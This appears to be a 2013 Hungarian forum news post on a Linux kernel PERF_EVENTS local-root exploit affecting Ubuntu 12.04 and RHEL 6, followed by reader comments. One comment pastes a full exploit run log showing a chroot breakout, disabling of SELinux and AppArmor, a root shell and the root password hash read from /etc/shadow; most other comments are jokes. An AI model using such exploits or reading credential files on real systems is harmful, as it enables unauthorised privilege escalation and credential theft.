Videó a Linux kernel sebezhetőség kihasználásáról Ubuntu és Red Hat Enterprise Linux alatt

 ( Hunger | 2013. május 18., szombat - 11:48 )

A csendben javított kritikus linux sebezhetőségre, amelyre három éve létezik exploit, most lecsapott Brad Spengler, a GRSecurity Linux kernel védelmi patch fejlesztője és portolta az eredeti exploit kódját a saját, Enlightenment nevű Linux kernel exploit keretrendszeréhez.

Az új verzió root jogokat szerez az Ubuntu 12.04 rendszereken és minden LSM alapú védelmet kikapcsol, AppArmortól az SELinuxig. A videó megtekinthető róla itt:

http://www.youtube.com/watch?v=llqxbMgIztk&hd=1

A problémát okozó PERF_EVENTS biztonsági hiba eredetileg csak 2.6.37 kerneleket és utánuk következőket érintette 3.8.10-ig, de a Red Hat sikeresen portolta vissza a sebezhetőséget az Enterprise Linux 6 esetén használt 2.6.32 verzióra is, így azok is támadhatók. Videó róla itt:

http://www.youtube.com/watch?v=WI0FXZUsLuI&hd=1

Hozzászólás megjelenítési lehetőségek

A választott hozzászólás megjelenítési mód a „Beállítás” gombbal rögzíthető.

koszi! legalabb videon latni neha linuxot, ha mashol nem is.

Jo de a mysql-hez nem fersz hozza igysem!

már chroot és fs namespaces kitöréssel:

bash-4.2$ id
uid=65534 gid=65534 groups=65534
bash-4.2$ uname -a
bash: uname: command not found
bash-4.2$ /
bin/   jail/  lib/   usr/   var/
bash-4.2$ cd /jail
bash-4.2$ ./exploit
Choose your exploit:
 [0] Abacus: Linux 2.6.37 -> 3.8.9 PERF_EVENTS local root
 [1] Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)
 [2] Sieve: Linux 2.6.18+ move_pages() infoleak
 [3] Exit
> 0
 ------------------------------------------------------------------------------
 Seek not the favor of the multitude; it is seldom got by honest and lawful
 means.  But seek the testimony of few; and number not voices, but weigh
 them. --Kant
 ------------------------------------------------------------------------------
 [+] Resolved init_task to 0xffffffff81c0d020 (via System.map)
 [+] Resolved init_fs to 0xffffffff81c4ab80 (via System.map)
 [+] Resolved selinux_enforcing to 0xffffffff81f0862c (via System.map)
 [+] Resolved selinux_enabled to 0xffffffff81f08628 (via System.map)
 [+] Resolved apparmor_enabled to 0xffffffff81c62e2c (via System.map)
 [+] Resolved security_ops to 0xffffffff81f06dd8 (via System.map)
 [+] Resolved default_security_ops to 0xffffffff81c5cf60 (via System.map)
 [+] Resolved sel_read_enforce to 0xffffffff812aaba0 (via System.map)
 [+] Resolved audit_enabled to 0xffffffff81e7af8c (via System.map)
 [+] Resolved commit_creds to 0xffffffff81092690 (via System.map)
 [+] Resolved prepare_kernel_cred to 0xffffffff81092940 (via System.map)
 [+] Resolved xen_start_info to 0xffffffff81dd9d48 (via System.map)
 [+] Resolved mark_rodata_ro to 0xffffffff810419d0 (via System.map)
 [+] Resolved set_kernel_text_ro to 0xffffffff81041980 (via System.map)
 [+] Resolved make_lowmem_page_readonly to 0xffffffff81009c00 (via System.map)
 [+] Resolved make_lowmem_page_readwrite to 0xffffffff81009c40 (via System.map)
 [+] Submitting index of -1 to perf_event_open
 [+] Submitting index of -2 to perf_event_open
 [+] CONFIG_JUMP_LABEL detected
 [+] Resolved perf_swevent_enabled to 0xffffffff81ef77a0 (via System.map)
 [+] Array base is 0xffffffff81ef77a0
 [+] Targeting 0xffffffff81dd8118
 [+] Submitting index of -49051 to perf_event_open
 [+] Got ring0!
 [+] Detected 2.6/3.x style 8k stacks, with current at 0xffff8803ed865c00 and cred support
 [+] Disabled security of : nothing, what an insecure machine!
 [+] Found ->fs offset at 0x548
 [+] Broke out of any chroots or fs namespaces
 [+] Got root!
root@ubuntu:/#id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/#uname -a
Linux ubuntu 3.2.0-39-generic #62-Ubuntu SMP Thu Feb 28 00:28:53 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:/#/
bin/        cdrom/      etc/        lib/        lib64/      media/      opt/        root/       sbin/       srv/        tank/       usr/
boot/       dev/        home/       lib32/      lost+found/ mnt/        proc/       run/        selinux/    sys/        tmp/        var/
root@ubuntu:/#head -1 /etc/shadow
root:$6$9d95PQXm$4nFdOCxtqPi8wMBugl4taKaCax574hAD2f0g6.6nKjdmcVxxXKB23O76GuvMuXMB0X3ZrR5jSHopJbvR8sqL40:15843:0:99999:7:::
root@ubuntu:/#

hamarosan vserver "támogatással"... :)

A PaX/GRSec ved ellene?
--
Ki oda vagyik, hol szall a galamb, elszalasztja a kincset itt alant.

term -e set S N

:)

Nem ismerem a parancsot :-)
--
Ki oda vagyik, hol szall a galamb, elszalasztja a kincset itt alant.

"természetesen" :)

:-)

Komolyra forditva, mi ez a parancs? Tenyleg erdekel.
--
Ki oda vagyik, hol szall a galamb, elszalasztja a kincset itt alant.

Olvasd föl sokszor, egymásután, a speciális karaktereket elhagyva... ;D

Hasonló:
- Hogyan teszel szert Ubuntu-ra?
- sudo apt-get install szer

Bakker. Jogos. Tul sok - relative uj - parancsot latok mostanaban, SZM-be se jutott egybeolvasni. #gonosz
--
Ki oda vagyik, hol szall a galamb, elszalasztja a kincset itt alant.

felesleges, a NAT elegendo vedelmet nyujt!

Nekem WGA kábelem van a routertől, az véd?

--
A főnököm mindig megtartja amit ígér, ha pénzt ígér azt is!

És a rúteredtől az ISP-dig, milyen kábeled van?
Ha nem WGA-s, akkor menet közben simán ugyanúgy megcsapolhatják az információidat.
Sőt, ott sokkal valószínűbb.

Ezért jobb vezeték nélküli hálózatokon nyomtatni, mert ott könnyebb észrevenni, ha lopják az adataidat: ugyanis, ha valaki a szobád előtt / ablakod alatt, egy bitekre specializált lepkehálóval hadonászik, az nagy valószínűséggel egy adataidat lopó krekker lesz.
De ez ellen is lehet védekezni, ha rézzel és üvegszállal átszőtt tapétát helyezel el a falon, és a Windows-on is.

A falat megcsináltam. Fontos Windowst is telepítenem, hogy védeni tudjam? :-)

--
A főnököm mindig megtartja amit ígér, ha pénzt ígér azt is!

Ez a lényeg!
De ne felejts el még egy túszfalat is emelni elé, olyan klasszikus égetett téglásat. iTong nem jó.
:D

[ feliratkozás ]

Majd akkor kell ilyen ha grafikus felület is lesz hozzá...:-)))

SELinux freak-eknek lehet különösen érdekes, hogy:
"minden LSM alapú védelmet kikapcsol, AppArmortól az SELinuxig"

"Jegyezze fel a vádhoz - utasította Metcalf őrnagy a tizedest, aki tudott gyorsírni. - Tiszteletlenül beszélt a feljebbvalójával, amikor nem pofázott közbe."

2013 a local root exploit éve!

de ezt miért nem küldted be hírnek? szerintem elég nagy hírértéke van...

Mert trey gonosz és elfogult, és úgyse fogja kirakni. Gondolom.

az elso harom ilyennel volt (lett volna) hirerteke, de a gokart akkoriban is fontosabb volt.

ma mar csak szorakoztatasi celokat szolgal.